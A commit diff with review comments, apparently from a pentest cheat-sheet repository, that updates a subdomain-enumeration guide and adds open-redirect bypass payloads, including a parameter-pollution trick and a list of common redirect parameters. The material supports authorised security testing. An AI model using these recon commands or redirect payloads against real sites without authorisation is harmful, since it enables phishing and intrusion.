Subdomain enumeration - New Aquatone (Go)

patch-1
Swissky 2018-11-05 13:45:52 +01:00
parent 6bcb43e39c
commit 1b2ee3e67a
2 changed files with 78 additions and 21 deletions

View File

@ -8,11 +8,12 @@
* GoogleDorks * GoogleDorks
* EyeWitness * EyeWitness
* Sublist3r * Sublist3r
* Aquatone
* Subfinder * Subfinder
* Aquatone (Ruby and Go versions)
* AltDNS * AltDNS
* MassDNS * MassDNS
* Subdomain take over * Subdomain take over
* tko-subs
* HostileSubBruteForcer * HostileSubBruteForcer
* SubOver * SubOver
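Review bot: the summary list still has `* EyeWitness` directly after `* GoogleDorks`, but the second hunk of this file moves the EyeWitness commands ahead of the Google Dorks section, so the list order and the section order now disagree for that pair; either swap those two entries or keep the EyeWitness block after the dorks section. The other changes line up: `* Aquatone (Ruby and Go versions)` sits after `* Subfinder`, matching the new Subfinder, Aquatone (Ruby), Aquatone (Go) sequence below, and `* tko-subs` lands under `* Subdomain take over` where its section is added.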
@ -33,6 +34,17 @@ git clone https://github.com/danielmiessler/SecLists.git
knockpy domain.com -w subdomains-top1mil-110000.txt knockpy domain.com -w subdomains-top1mil-110000.txt
``` ```
Using EyeWitness and Nmap scans from the KnockPy and enumall scans
```bash
git clone https://github.com/ChrisTruncer/EyeWitness.git
./setup/setup.sh
./EyeWitness.py -f filename -t optionaltimeout --open (Optional)
./EyeWitness -f urls.txt --web
./EyeWitness -x urls.xml -t 8 --headless
./EyeWitness -f rdp.txt --rdp
```
### Using Google Dorks and Google Transparency Report ### Using Google Dorks and Google Transparency Report
You need to include subdomains ;) You need to include subdomains ;)
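Review bot: the moved EyeWitness block has lost its `###` heading. `Using EyeWitness and Nmap scans from the KnockPy and enumall scans` is now a bare sentence right after the KnockPy fence, so it no longer renders as a section and the `* EyeWitness` entry in the summary has nothing to point at; restore it as `### Using EyeWitness and Nmap scans from the KnockPy and enumall scans`. While the block is being touched, `./EyeWitness.py -f filename -t optionaltimeout --open (Optional)` is a usage template rather than a runnable line and sits between concrete invocations; turning it into a comment (e.g. `# EyeWitness.py -f <file> -t <timeout> [--open]`) would stop readers pasting `(Optional)` into a shell.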
@ -47,17 +59,6 @@ site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
site:*.*.domain.com site:*.*.domain.com
``` ```
### EyeWitness and Nmap scans from the KnockPy and enumall scans
```bash
git clone https://github.com/ChrisTruncer/EyeWitness.git
./setup/setup.sh
./EyeWitness.py -f filename -t optionaltimeout --open (Optional)
./EyeWitness -f urls.txt --web
./EyeWitness -x urls.xml -t 8 --headless
./EyeWitness -f rdp.txt --rdp
```
### Using Sublist3r ### Using Sublist3r
```bash ```bash
@ -73,7 +74,18 @@ python sublist3r.py -e google,yahoo,virustotal -d example.com
python sublist3r.py -b -d example.com python sublist3r.py -b -d example.com
``` ```
### Using Aquatone ### Using Subfinder
```powershell
go get github.com/subfinder/subfinder
./Subfinder/subfinder --set-config PassivetotalUsername='USERNAME',PassivetotalKey='KEY'
./Subfinder/subfinder --set-config RiddlerEmail="EMAIL",RiddlerPassword="PASSWORD"
./Subfinder/subfinder --set-config CensysUsername="USERNAME",CensysSecret="SECRET"
./Subfinder/subfinder --set-config SecurityTrailsKey='KEY'
./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt
```
### Using Aquatone - old version (Ruby)
```powershell ```powershell
gem install aquatone gem install aquatone
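Review bot: the new Subfinder block is fenced as ```powershell although every line is a Linux shell command (`go get`, `./Subfinder/subfinder ...`); the rest of this file uses ```bash for the same kind of commands, so use that here. Also, `go get github.com/subfinder/subfinder` installs the binary into `$GOPATH/bin`, while the following lines invoke `./Subfinder/subfinder`, which implies a separate `git clone` plus build; one of the two paths should be fixed so the snippet works as pasted. The four `--set-config` lines put API keys and account passwords on the command line, which means they end up in shell history; a one-line reminder to clear or disable history for those commands (or to use the placeholders `USERNAME`/`KEY` only as shown) would help readers who copy the block verbatim.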
@ -102,15 +114,16 @@ docker pull txt3rob/aquatone-docker
docker run -it txt3rob/aquatone-docker aq example.com docker run -it txt3rob/aquatone-docker aq example.com
``` ```
### Using Subfinder ### Using Aquatone - new version (Go)
```powershell ```powershell
go get github.com/subfinder/subfinder # Subfinder version
./Subfinder/subfinder --set-config PassivetotalUsername='USERNAME',PassivetotalKey='KEY' ./Subfinder/subfinder -d $1 -r 8.8.8.8,1.1.1.1 -nW -o /tmp/subresult$1
./Subfinder/subfinder --set-config RiddlerEmail="EMAIL",RiddlerPassword="PASSWORD" cat /tmp/subresult$1 | ./Aquatone/aquatone -ports large -out /tmp/aquatone$1
./Subfinder/subfinder --set-config CensysUsername="USERNAME",CensysSecret="SECRET"
./Subfinder/subfinder --set-config SecurityTrailsKey='KEY' # Amass version
./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt ./Amass/amass -active -brute -o /tmp/hosts.txt -d $1
cat /tmp/hosts.txt | ./Aquatone/aquatone -ports large -out /tmp/aquatone$1
``` ```
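Review bot: `$1` in `./Subfinder/subfinder -d $1 -r 8.8.8.8,1.1.1.1 -nW -o /tmp/subresult$1` and in the `-out /tmp/aquatone$1` paths is a script positional parameter, but the block is presented like the surrounding sections as commands to type; either state that this is the body of a wrapper script taking the target domain as its argument, or use `example.com` as the other sections do. Same path issue as in the Subfinder hunk: `./Amass/amass` and `./Aquatone/aquatone` assume local checkouts that the text never sets up. Smaller points: the fence is ```powershell for Linux commands again (prefer ```bash), and `-ports large` is the one flag worth a word, since the port preset decides how many ports Aquatone probes on every discovered host and therefore how long and how noisy the run is.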
### Using AltDNS ### Using AltDNS
@ -135,6 +148,13 @@ cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/res
Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records. Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records.
### Using tko-subs
```powershell
go get github.com/anshumanbh/tko-subs
./bin/tko-subs -domains=./lists/domains_tkos.txt -data=./lists/providers-data.csv
```
### Using HostileSubBruteForcer ### Using HostileSubBruteForcer
```bash ```bash
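Review bot: the input file in `./bin/tko-subs -domains=./lists/domains_tkos.txt -data=./lists/providers-data.csv` is not connected to anything produced earlier in the file (the enumeration sections write `/tmp/results_subfinder.txt` and `/tmp/hosts.txt`); saying that `domains_tkos.txt` is the candidate subdomain list from the previous steps, and whether `providers-data.csv` is the fingerprint file shipped with the tool, would make the step reproducible. As with the other Go tools in this patch, `go get` installs to `$GOPATH/bin`, not `./bin/`, and the fence should be ```bash rather than ```powershell.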

View File

@ -1,6 +1,6 @@
# Open URL Redirection # Open URL Redirection
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the applications access control check and then forward the attacker to privileged functions that they would normally not be able to access. > Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the applications access control check and then forward the attacker to privileged functions that they would normally not be able to access.
## Fuzzing ## Fuzzing
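Review bot: the intro paragraph is now a `>` blockquote, which marks it as quoted text, but no source is given next to it; if it is taken from the OWASP cheat sheet credited under `## Thanks to`, put the link on the quote itself so the attribution travels with the text. Pre-existing typo carried into the quote: `the applications access control check` should read `the application's access control check`.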
@ -57,6 +57,12 @@ Using null byte "%00" to bypass blacklist filter
//google%00.com //google%00.com
``` ```
Using parameter pollution
```powershell
?next=whitelisted.com&next=google.com
```
Using "@" character, browser will redirect to anything after the "@" Using "@" character, browser will redirect to anything after the "@"
```powershell ```powershell
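Review bot: `?next=whitelisted.com&next=google.com` needs one sentence of explanation: the trick only works when the validation code and the redirect code read different occurrences of a duplicated parameter (first versus last), which varies by framework and language, so the bare line tells the reader neither when to expect it to succeed nor what the fix is (validate exactly the value that is later used for the redirect, and reject duplicated redirect parameters). The ```powershell fence is consistent with the other payload blocks in this file, so no change needed there.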
@ -88,8 +94,39 @@ XSS from javascript:// wrapper
http://www.example.com/redirect.php?url=javascript:prompt(1) http://www.example.com/redirect.php?url=javascript:prompt(1)
``` ```
## Common injection parameters
```powershell
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
```
## Thanks to ## Thanks to
* filedescriptor * filedescriptor
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
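Review bot: the `## Common injection parameters` list mixes query parameters (`?next={payload}`) with path forms (`/redirect/{payload}`, `/cgi-bin/redirect.cgi?{payload}`) without saying how `{payload}` is substituted or that the bare `?name=` forms are appended to an existing path; a sentence before the fence would turn it into a usable checklist, and for defenders the same list doubles as the set of redirect parameter names worth grepping for in an application before auditing its redirect handling. The new Pentester Land entry under `## Thanks to` looks like the source of this list; if it is, reference it at the list as well.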